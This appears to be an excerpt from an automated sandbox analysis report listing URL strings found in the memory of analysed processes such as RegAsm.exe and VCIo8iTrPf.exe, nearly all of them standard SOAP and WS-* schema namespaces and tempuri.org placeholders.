Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsps.ssl.com0
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty0X
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/D
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Ent
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
